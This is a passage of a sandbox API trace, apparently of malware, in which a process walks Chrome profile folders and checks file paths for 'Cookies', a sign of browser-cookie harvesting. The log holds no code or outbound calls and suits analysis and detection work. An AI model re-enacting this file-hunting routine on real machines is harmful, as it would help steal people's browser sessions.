lstrcmpiW (lpString1="reports", lpString2=".") returned 1 [0163.009] lstrcmpiW (lpString1="reports", lpString2="..") returned 1 [0163.009] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0163.009] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0163.009] lstrlenW (lpString="\\") returned 1 [0163.009] GetProcessHeap () returned 0x8e0000 [0163.009] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9c) returned 0x9254b8 [0163.009] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0163.009] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0163.009] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 77 [0163.009] lstrlenW (lpString="reports") returned 7 [0163.009] GetProcessHeap () returned 0x8e0000 [0163.009] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xaa) returned 0x925560 [0163.009] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0163.009] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", lpString2="reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports" [0163.009] VirtualQuery (in: lpAddress=0x9254b8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.009] GetProcessHeap () returned 0x8e0000 [0163.009] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254b8 | out: hHeap=0x8e0000) returned 1 [0163.009] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 84 [0163.009] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 84 [0163.009] lstrlenW (lpString="\\*.*") returned 4 [0163.009] GetProcessHeap () returned 0x8e0000 [0163.009] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925618 [0163.009] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports" [0163.009] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*.*" [0163.009] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0163.010] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.010] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.010] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.010] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.010] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0163.010] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0163.010] VirtualQuery (in: lpAddress=0x925618, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.010] GetProcessHeap () returned 0x8e0000 [0163.010] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925618 | out: hHeap=0x8e0000) returned 1 [0163.010] VirtualQuery (in: lpAddress=0x925560, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.010] GetProcessHeap () returned 0x8e0000 [0163.010] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925560 | out: hHeap=0x8e0000) returned 1 [0163.010] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a6374a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0163.010] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0163.010] lstrlenW (lpString="\\") returned 1 [0163.010] GetProcessHeap () returned 0x8e0000 [0163.010] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9c) returned 0x9254b8 [0163.010] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0163.010] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0163.010] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 77 [0163.010] lstrlenW (lpString="settings.dat") returned 12 [0163.010] GetProcessHeap () returned 0x8e0000 [0163.011] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb4) returned 0x925560 [0163.011] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0163.011] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", lpString2="settings.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" [0163.011] VirtualQuery (in: lpAddress=0x9254b8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.011] GetProcessHeap () returned 0x8e0000 [0163.011] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254b8 | out: hHeap=0x8e0000) returned 1 [0163.011] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", lpSrch="Cookies") returned 0x0 [0163.011] VirtualQuery (in: lpAddress=0x925560, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.011] GetProcessHeap () returned 0x8e0000 [0163.011] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925560 | out: hHeap=0x8e0000) returned 1 [0163.011] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a6374a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0163.011] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0163.011] VirtualQuery (in: lpAddress=0x925408, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.011] GetProcessHeap () returned 0x8e0000 [0163.011] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925408 | out: hHeap=0x8e0000) returned 1 [0163.011] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.011] GetProcessHeap () returned 0x8e0000 [0163.011] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0163.011] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0163.011] lstrcmpiW (lpString1="Default", lpString2=".") returned 1 [0163.011] lstrcmpiW (lpString1="Default", lpString2="..") returned 1 [0163.011] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.011] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.011] lstrlenW (lpString="\\") returned 1 [0163.011] GetProcessHeap () returned 0x8e0000 [0163.011] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0163.011] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0163.011] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.011] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0163.011] lstrlenW (lpString="Default") returned 7 [0163.012] GetProcessHeap () returned 0x8e0000 [0163.012] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x98) returned 0x925360 [0163.012] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.012] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.012] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.012] GetProcessHeap () returned 0x8e0000 [0163.012] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.012] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.012] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.012] lstrlenW (lpString="\\*.*") returned 4 [0163.012] GetProcessHeap () returned 0x8e0000 [0163.012] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x925400 [0163.012] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.012] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*" [0163.012] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0163.012] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.012] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.012] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.012] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.012] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0163.012] lstrcmpiW (lpString1="Cache", lpString2=".") returned 1 [0163.012] lstrcmpiW (lpString1="Cache", lpString2="..") returned 1 [0163.012] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.012] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.013] lstrlenW (lpString="\\") returned 1 [0163.013] GetProcessHeap () returned 0x8e0000 [0163.013] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0163.013] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.013] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.013] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0163.013] lstrlenW (lpString="Cache") returned 5 [0163.013] GetProcessHeap () returned 0x8e0000 [0163.013] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa4) returned 0x925550 [0163.013] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.013] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0163.013] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.013] GetProcessHeap () returned 0x8e0000 [0163.013] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0163.013] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0163.013] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0163.013] lstrlenW (lpString="\\*.*") returned 4 [0163.013] GetProcessHeap () returned 0x8e0000 [0163.013] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xac) returned 0x925600 [0163.013] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0163.013] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*" [0163.013] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0163.014] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.014] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.014] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.014] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.014] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_0", cAlternateFileName="")) returned 1 [0163.014] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0163.014] lstrlenW (lpString="\\") returned 1 [0163.014] GetProcessHeap () returned 0x8e0000 [0163.014] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x9256b8 [0163.014] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0163.014] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0163.014] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 82 [0163.014] lstrlenW (lpString="data_0") returned 6 [0163.014] GetProcessHeap () returned 0x8e0000 [0163.014] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925768 [0163.014] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: 